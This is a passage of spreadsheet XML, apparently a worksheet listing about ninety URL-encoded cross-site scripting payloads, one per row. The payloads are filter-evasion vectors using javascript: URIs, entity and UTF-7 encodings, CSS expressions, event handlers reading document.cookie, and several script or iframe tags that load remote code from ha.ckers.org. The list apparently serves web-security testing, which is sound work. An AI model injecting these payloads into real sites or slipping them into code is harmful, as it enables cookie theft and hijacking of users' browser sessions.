        <f t="shared" si="1"/>
        <v>%3CBGSOUND%20SRC%3D%22javascript%3Ajavascript%3Aalert%281%29%3B%22%3E</v>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="3" t="s">
        <v>412</v>
      </c>
      <c r="B413" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBR%20SIZE%3D%22%26%7Bjavascript%3Aalert%281%29%7D%22%3E</v>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="3" t="s">
        <v>413</v>
      </c>
      <c r="B414" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CLAYER%20SRC%3D%22%25%28scriptlet%29s%22%3E%3C%2FLAYER%3E</v>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="3" t="s">
        <v>414</v>
      </c>
      <c r="B415" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CLINK%20REL%3D%22stylesheet%22%20HREF%3D%22javascript%3Ajavascript%3Aalert%281%29%3B%22%3E</v>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="3" t="s">
        <v>415</v>
      </c>
      <c r="B416" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%3E%40import%27%25%28css%29s%27%3B%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="3" t="s">
        <v>416</v>
      </c>
      <c r="B417" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CMETA%20HTTP-EQUIV%3D%22Link%22%20Content%3D%22%3C%25%28css%29s%3E%3B%20REL%3Dstylesheet%22%3E</v>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="3" t="s">
        <v>417</v>
      </c>
      <c r="B418" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CXSS%20STYLE%3D%22behavior%3A%20url%28%25%28htc%29s%29%3B%22%3E</v>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="3" t="s">
        <v>418</v>
      </c>
      <c r="B419" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%3Eli%20%7Blist-style-image%3A%20url%28%22javascript%3Ajavascript%3Aalert%281%29%22%29%3B%7D%3C%2FSTYLE%3E%3CUL%3E%3CLI%3EXSS</v>
      </c>
    </row>
    <row r="420">
      <c r="A420" s="3" t="s">
        <v>419</v>
      </c>
      <c r="B420" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CMETA%20HTTP-EQUIV%3D%22refresh%22%20CONTENT%3D%220%3Burl%3Djavascript%3Ajavascript%3Aalert%281%29%3B%22%3E</v>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="3" t="s">
        <v>420</v>
      </c>
      <c r="B421" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CMETA%20HTTP-EQUIV%3D%22refresh%22%20CONTENT%3D%220%3B%20URL%3Dhttp%3A%2F%2F%3BURL%3Djavascript%3Ajavascript%3Aalert%281%29%3B%22%3E</v>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="3" t="s">
        <v>421</v>
      </c>
      <c r="B422" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIFRAME%20SRC%3D%22javascript%3Ajavascript%3Aalert%281%29%3B%22%3E%3C%2FIFRAME%3E</v>
      </c>
    </row>
    <row r="423">
      <c r="A423" s="3" t="s">
        <v>422</v>
      </c>
      <c r="B423" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CTABLE%20BACKGROUND%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="3" t="s">
        <v>423</v>
      </c>
      <c r="B424" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CTABLE%3E%3CTD%20BACKGROUND%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="425">
      <c r="A425" s="3" t="s">
        <v>424</v>
      </c>
      <c r="B425" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CDIV%20STYLE%3D%22background-image%3A%20url%28javascript%3Ajavascript%3Aalert%281%29%29%22%3E</v>
      </c>
    </row>
    <row r="426">
      <c r="A426" s="3" t="s">
        <v>425</v>
      </c>
      <c r="B426" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CDIV%20STYLE%3D%22width%3Aexpression%28javascript%3Aalert%281%29%29%3B%22%3E</v>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="3" t="s">
        <v>426</v>
      </c>
      <c r="B427" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20STYLE%3D%22xss%3Aexpr%2F%2AXSS%2A%2Fession%28javascript%3Aalert%281%29%29%22%3E</v>
      </c>
    </row>
    <row r="428">
      <c r="A428" s="3" t="s">
        <v>427</v>
      </c>
      <c r="B428" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CXSS%20STYLE%3D%22xss%3Aexpression%28javascript%3Aalert%281%29%29%22%3E</v>
      </c>
    </row>
    <row r="429">
      <c r="A429" s="3" t="s">
        <v>428</v>
      </c>
      <c r="B429" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%20TYPE%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="430">
      <c r="A430" s="3" t="s">
        <v>429</v>
      </c>
      <c r="B430" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%3E.XSS%7Bbackground-image%3Aurl%28%22javascript%3Ajavascript%3Aalert%281%29%22%29%3B%7D%3C%2FSTYLE%3E%3CA%20CLASS%3DXSS%3E%3C%2FA%3E</v>
      </c>
    </row>
    <row r="431">
      <c r="A431" s="3" t="s">
        <v>430</v>
      </c>
      <c r="B431" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%20type%3D%22text%2Fcss%22%3EBODY%7Bbackground%3Aurl%28%22javascript%3Ajavascript%3Aalert%281%29%22%29%7D%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="432">
      <c r="A432" s="3" t="s">
        <v>431</v>
      </c>
      <c r="B432" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21--%5Bif%20gte%20IE%204%5D%3E%3CSCRIPT%3Ejavascript%3Aalert%281%29%3B%3C%2FSCRIPT%3E%3C%21%5Bendif%5D--%3E</v>
      </c>
    </row>
    <row r="433">
      <c r="A433" s="3" t="s">
        <v>432</v>
      </c>
      <c r="B433" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBASE%20HREF%3D%22javascript%3Ajavascript%3Aalert%281%29%3B%2F%2F%22%3E</v>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="3" t="s">
        <v>433</v>
      </c>
      <c r="B434" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3COBJECT%20TYPE%3D%22text%2Fx-scriptlet%22%20DATA%3D%22%25%28scriptlet%29s%22%3E%3C%2FOBJECT%3E</v>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="3" t="s">
        <v>434</v>
      </c>
      <c r="B435" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3COBJECT%20classid%3Dclsid%3Aae24fdae-03c6-11d1-8b76-0080c744f389%3E%3Cparam%20name%3Durl%20value%3Djavascript%3Ajavascript%3Aalert%281%29%3E%3C%2FOBJECT%3E</v>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="3" t="s">
        <v>435</v>
      </c>
      <c r="B436" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CHTML%20xmlns%3Axss%3E%3C%3Fimport%20namespace%3D%22xss%22%20implementation%3D%22%25%28htc%29s%22%3E%3Cxss%3Axss%3EXSS%3C%2Fxss%3Axss%3E%3C%2FHTML%3E%22%22%22%2C%22XML%20namespace.%22%29%2C%28%22%22%22%3CXML%20ID%3D%22xss%22%3E%3CI%3E%3CB%3E%26lt%3BIMG%20SRC%3D%22javas%3C%21--%20--%3Ecript%3Ajavascript%3Aalert%281%29%22%26gt%3B%3C%2FB%3E%3C%2FI%3E%3C%2FXML%3E%3CSPAN%20DATASRC%3D%22%23xss%22%20DATAFLD%3D%22B%22%20DATAFORMATAS%3D%22HTML%22%3E%3C%2FSPAN%3E</v>
      </c>
    </row>
    <row r="437">
      <c r="A437" s="3" t="s">
        <v>436</v>
      </c>
      <c r="B437" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CHTML%3E%3CBODY%3E%3C%3Fxml%3Anamespace%20prefix%3D%22t%22%20ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E%3C%3Fimport%20namespace%3D%22t%22%20implementation%3D%22%23default%23time2%22%3E%3Ct%3Aset%20attributeName%3D%22innerHTML%22%20to%3D%22XSS%26lt%3BSCRIPT%20DEFER%26gt%3Bjavascript%3Aalert%281%29%26lt%3B%2FSCRIPT%26gt%3B%22%3E%3C%2FBODY%3E%3C%2FHTML%3E</v>
      </c>
    </row>
    <row r="438">
      <c r="A438" s="3" t="s">
        <v>437</v>
      </c>
      <c r="B438" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20SRC%3D%22%25%28jpg%29s%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="439">
      <c r="A439" s="3" t="s">
        <v>438</v>
      </c>
      <c r="B439" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CHEAD%3E%3CMETA%20HTTP-EQUIV%3D%22CONTENT-TYPE%22%20CONTENT%3D%22text%2Fhtml%3B%20charset%3DUTF-7%22%3E%20%3C%2FHEAD%3E%2BADw-SCRIPT%2BAD4-%25%28payload%29s%3B%2BADw-%2FSCRIPT%2BAD4-</v>
      </c>
    </row>
    <row r="440">
      <c r="A440" s="3" t="s">
        <v>439</v>
      </c>
      <c r="B440" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%20id%3D%22test%22%20%2F%3E%3Cbutton%20form%3D%22test%22%20formaction%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3EX</v>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="3" t="s">
        <v>440</v>
      </c>
      <c r="B441" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onscroll%3Djavascript%3Aalert%281%29%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input%20autofocus%3E</v>
      </c>
    </row>
    <row r="442">
      <c r="A442" s="3" t="s">
        <v>441</v>
      </c>
      <c r="B442" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CP%20STYLE%3D%22behavior%3Aurl%28%27%23default%23time2%27%29%22%20end%3D%220%22%20onEnd%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="443">
      <c r="A443" s="3" t="s">
        <v>415</v>
      </c>
      <c r="B443" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%3E%40import%27%25%28css%29s%27%3B%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="444">
      <c r="A444" s="3" t="s">
        <v>442</v>
      </c>
      <c r="B444" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%3Ea%7Bbackground%3Aurl%28%27s1%27%20%27s2%29%7D%40import%20javascript%3Ajavascript%3Aalert%281%29%3B%27%29%3B%7D%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="445">
      <c r="A445" s="3" t="s">
        <v>443</v>
      </c>
      <c r="B445" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20charset%3D%20%22x-imap4-modified-utf7%22%26%26%3E%26%26%3Cscript%26%26%3Ejavascript%3Aalert%281%29%26%26%3B%26%26%3C%26%26%2Fscript%26%26%3E</v>
      </c>
    </row>
    <row r="446">
      <c r="A446" s="3" t="s">
        <v>444</v>
      </c>
      <c r="B446" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20onreadystatechange%3Djavascript%3Ajavascript%3Aalert%281%29%3B%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="447">
      <c r="A447" s="3" t="s">
        <v>445</v>
      </c>
      <c r="B447" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%20onreadystatechange%3Djavascript%3Ajavascript%3Aalert%281%29%3B%3E%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="448">
      <c r="A448" s="3" t="s">
        <v>446</v>
      </c>
      <c r="B448" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Chtml%3Ahtml%20xmlns%3Ahtml%3D%27http%3A%2F%2Fwww.w3.org%2F1999%2Fxhtml%27%3E%3Chtml%3Ascript%3Ejavascript%3Aalert%281%29%3B%3C%2Fhtml%3Ascript%3E%3C%2Fhtml%3Ahtml%3E</v>
      </c>
    </row>
    <row r="449">
      <c r="A449" s="3" t="s">
        <v>447</v>
      </c>
      <c r="B449" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cembed%20code%3D%25%28scriptlet%29s%3E%3C%2Fembed%3E</v>
      </c>
    </row>
    <row r="450">
      <c r="A450" s="3" t="s">
        <v>448</v>
      </c>
      <c r="B450" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cembed%20code%3Djavascript%3Ajavascript%3Aalert%281%29%3B%3E%3C%2Fembed%3E</v>
      </c>
    </row>
    <row r="451">
      <c r="A451" s="3" t="s">
        <v>449</v>
      </c>
      <c r="B451" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cembed%20src%3D%25%28jscript%29s%3E%3C%2Fembed%3E</v>
      </c>
    </row>
    <row r="452">
      <c r="A452" s="3" t="s">
        <v>450</v>
      </c>
      <c r="B452" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cframeset%20onload%3Djavascript%3Ajavascript%3Aalert%281%29%3E%3C%2Fframeset%3E</v>
      </c>
    </row>
    <row r="453">
      <c r="A453" s="3" t="s">
        <v>451</v>
      </c>
      <c r="B453" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20onerror%3Djavascript%3Ajavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="454">
      <c r="A454" s="3" t="s">
        <v>452</v>
      </c>
      <c r="B454" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cembed%20type%3D%22image%22%20src%3D%25%28scriptlet%29s%3E%3C%2Fembed%3E</v>
      </c>
    </row>
    <row r="455">
      <c r="A455" s="3" t="s">
        <v>453</v>
      </c>
      <c r="B455" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CXML%20ID%3DI%3E%3CX%3E%3CC%3E%3C%21%5BCDATA%5B%3CIMG%20SRC%3D%22javas%5D%5D%3C%21%5BCDATA%5Bcript%3Ajavascript%3Aalert%281%29%3B%22%3E%5D%5D%3C%2FC%3E%3CX%3E%3C%2Fxml%3E</v>
      </c>
    </row>
    <row r="456">
      <c r="A456" s="3" t="s">
        <v>454</v>
      </c>
      <c r="B456" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%26%7Bjavascript%3Aalert%281%29%3B%7D%3B%3E</v>
      </c>
    </row>
    <row r="457">
      <c r="A457" s="3" t="s">
        <v>455</v>
      </c>
      <c r="B457" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22jav%26%2365ascript%3Ajavascript%3Aalert%281%29%22%3Etest1%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="458">
      <c r="A458" s="3" t="s">
        <v>456</v>
      </c>
      <c r="B458" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22jav%26%2397ascript%3Ajavascript%3Aalert%281%29%22%3Etest1%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="459">
      <c r="A459" s="3" t="s">
        <v>457</v>
      </c>
      <c r="B459" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cembed%20width%3D500%20height%3D500%20code%3D%22data%3Atext%2Fhtml%2C%3Cscript%3E%25%28payload%29s%3C%2Fscript%3E%22%3E%3C%2Fembed%3E</v>
      </c>
    </row>
    <row r="460">
      <c r="A460" s="3" t="s">
        <v>458</v>
      </c>
      <c r="B460" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20srcdoc%3D%22%26LT%3Biframe%26sol%3Bsrcdoc%3D%26amp%3Blt%3Bimg%26sol%3Bsrc%3D%26amp%3Bapos%3B%26amp%3Bapos%3Bonerror%3Djavascript%3Aalert%281%29%26amp%3Bgt%3B%3E%22%3E</v>
      </c>
    </row>
    <row r="461">
      <c r="A461" s="5" t="s">
        <v>459</v>
      </c>
      <c r="B461" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3B</v>
      </c>
    </row>
    <row r="462">
      <c r="A462" s="3" t="s">
        <v>460</v>
      </c>
      <c r="B462" s="4" t="str">
        <f t="shared" si="1"/>
        <v>alert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--</v>
      </c>
    </row>
    <row r="463">
      <c r="A463" s="3" t="s">
        <v>461</v>
      </c>
      <c r="B463" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="464">
      <c r="A464" s="5" t="s">
        <v>462</v>
      </c>
      <c r="B464" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D</v>
      </c>
    </row>
    <row r="465">
      <c r="A465" s="3" t="s">
        <v>463</v>
      </c>
      <c r="B465" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="466">
      <c r="A466" s="3" t="s">
        <v>464</v>
      </c>
      <c r="B466" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="467">
      <c r="A467" s="3" t="s">
        <v>465</v>
      </c>
      <c r="B467" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Djavascript%3Aalert%28%27XSS%27%29%3E</v>
      </c>
    </row>
    <row r="468">
      <c r="A468" s="3" t="s">
        <v>466</v>
      </c>
      <c r="B468" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3DJaVaScRiPt%3Aalert%28%27XSS%27%29%3E</v>
      </c>
    </row>
    <row r="469">
      <c r="A469" s="3" t="s">
        <v>467</v>
      </c>
      <c r="B469" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Djavascript%3Aalert%28%22XSS%22%29%3E</v>
      </c>
    </row>
    <row r="470">
      <c r="A470" s="3" t="s">
        <v>468</v>
      </c>
      <c r="B470" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%60javascript%3Aalert%28%22RSnake%20says%2C%20%27XSS%27%22%29%60%3E</v>
      </c>
    </row>
    <row r="471">
      <c r="A471" s="3" t="s">
        <v>469</v>
      </c>
      <c r="B471" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20onmouseover%3D%22alert%28document.cookie%29%22%3Exxs%20link%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="472">
      <c r="A472" s="3" t="s">
        <v>470</v>
      </c>
      <c r="B472" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20onmouseover%3Dalert%28document.cookie%29%3Exxs%20link%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="473">
      <c r="A473" s="3" t="s">
        <v>471</v>
      </c>
      <c r="B473" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E</v>
      </c>
    </row>
    <row r="474">
      <c r="A474" s="3" t="s">
        <v>472</v>
      </c>
      <c r="B474" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Djavascript%3Aalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E</v>
      </c>
    </row>
    <row r="475">
      <c r="A475" s="3" t="s">
        <v>473</v>
      </c>
      <c r="B475" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%23%20onmouseover%3D%22alert%28%27xxs%27%29%22%3E</v>
      </c>
    </row>
    <row r="476">
      <c r="A476" s="3" t="s">
        <v>474</v>
      </c>
      <c r="B476" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%20onmouseover%3D%22alert%28%27xxs%27%29%22%3E</v>
      </c>
    </row>
    <row r="477">
      <c r="A477" s="3" t="s">
        <v>475</v>
      </c>
      <c r="B477" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20onmouseover%3D%22alert%28%27xxs%27%29%22%3E</v>
      </c>
    </row>
    <row r="478">
      <c r="A478" s="3" t="s">
        <v>476</v>
      </c>
      <c r="B478" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2358%3B%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%26%2340%3B%26%2339%3B%26%2388%3B%26%2383%3B%26%2383%3B%26%2339%3B%26%2341%3B%3E</v>
      </c>
    </row>
    <row r="479">
      <c r="A479" s="3" t="s">
        <v>477</v>
      </c>
      <c r="B479" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041%3E</v>
      </c>
    </row>
    <row r="480">
      <c r="A480" s="3" t="s">
        <v>478</v>
      </c>
      <c r="B480" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3E</v>
      </c>
    </row>
    <row r="481">
      <c r="A481" s="3" t="s">
        <v>479</v>
      </c>
      <c r="B481" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22jav</v>
      </c>
    </row>
    <row r="482">
      <c r="A482" s="3" t="s">
        <v>480</v>
      </c>
      <c r="B482" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22jav%26%23x09%3Bascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="483">
      <c r="A483" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B483" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22jav%26%23x0A%3Bascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="484">
      <c r="A484" s="3" t="s">
        <v>482</v>
      </c>
      <c r="B484" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22jav%26%23x0D%3Bascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="485">
      <c r="A485" s="3" t="s">
        <v>483</v>
      </c>
      <c r="B485" s="4" t="str">
        <f t="shared" si="1"/>
        <v>perl%20-e%20%27print%20%22%3CIMG%20SRC%3Djava%5C0script%3Aalert%28%5C%22XSS%5C%22%29%3E%22%3B%27%20%3E%20out</v>
      </c>
    </row>
    <row r="486">
      <c r="A486" s="3" t="s">
        <v>484</v>
      </c>
      <c r="B486" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22%20%26%2314%3B%20%20javascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="487">
      <c r="A487" s="3" t="s">
        <v>485</v>
      </c>
      <c r="B487" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%2FXSS%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="488">
      <c r="A488" s="3" t="s">
        <v>486</v>
      </c>
      <c r="B488" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBODY%20onload%21%23%24%25%26%28%29%2A%7E%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Dalert%28%22XSS%22%29%3E</v>
      </c>
    </row>
    <row r="489">
      <c r="A489" s="3" t="s">
        <v>487</v>
      </c>
      <c r="B489" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%2FSRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="490">
      <c r="A490" s="3" t="s">
        <v>488</v>
      </c>
      <c r="B490" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="491">
      <c r="A491" s="3" t="s">
        <v>489</v>
      </c>
      <c r="B491" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3F%3C%20B%20%3E</v>
      </c>
    </row>
    <row r="492">
      <c r="A492" s="3" t="s">
        <v>490</v>
      </c>
      <c r="B492" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20SRC%3D%2F%2Fha.ckers.org%2F.j%3E</v>
      </c>
    </row>
    <row r="493">
      <c r="A493" s="3" t="s">
        <v>491</v>
      </c>
      <c r="B493" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22</v>
      </c>
    </row>
    <row r="494">
      <c r="A494" s="3" t="s">
        <v>492</v>
      </c>
      <c r="B494" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3Dhttp%3A%2F%2Fha.ckers.org%2Fscriptlet.html%20%3C</v>
      </c>
    </row>
    <row r="495">
      <c r="A495" s="3" t="s">
        <v>493</v>
      </c>
      <c r="B495" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%5C%22%3Balert%28%27XSS%27%29%3B%2F%2F</v>
      </c>
    </row>
    <row r="496">
      <c r="A496" s="3" t="s">
        <v>494</v>
      </c>
      <c r="B496" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="497">
      <c r="A497" s="3" t="s">
        <v>495</v>
      </c>
      <c r="B497" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CINPUT%20TYPE%3D%22IMAGE%22%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="498">
      <c r="A498" s="3" t="s">
        <v>496</v>
      </c>
      <c r="B498" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBODY%20BACKGROUND%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E</v>
      </c>
    </row>
    <row r="499">
      <c r="A499" s="3" t="s">
        <v>497</v>
      </c>
      <c r="B499" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20DYNSRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E</v>
      </c>
    </row>
    <row r="500">
      <c r="A500" s="3" t="s">
        <v>498</v>
      </c>
      <c r="B500" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20LOWSRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E</v>
      </c>
    </row>
    <row r="501">
      <c r="A501" s="3" t="s">
        <v>499</v>
      </c>
      <c r="B501" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%3Eli%20%7Blist-style-image%3A%20url%28%22javascript%3Aalert%28%27XSS%27%29%22%29%3B%7D%3C%2FSTYLE%3E%3CUL%3E%3CLI%3EXSS%3C%2Fbr%3E</v>
      </c>
    </row>
    <row r="502">
      <c r="A502" s="3" t="s">
        <v>500</v>
      </c>
      <c r="B502" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%27vbscript%3Amsgbox%28%22XSS%22%29%27%3E</v>
      </c>
    </row>
    <row r="503">
      <c r="A503" s="3" t="s">
        <v>501</v>
      </c>
      <c r="B503" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22livescript%3A%5Bcode%5D%22%3E</v>
      </c>
    </row>
    <row r="504">
      <c r="A504" s="3" t="s">
        <v>502</v>
      </c>
      <c r="B504" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBODY%20ONLOAD%3Dalert%28%27XSS%27%29%3E</v>
      </c>
    </row>
    <row r="505">
      <c r="A505" s="3" t="s">
        <v>503</v>
      </c>
      <c r="B505" s="4" t="str">
        <f t="shared" si="1"/>
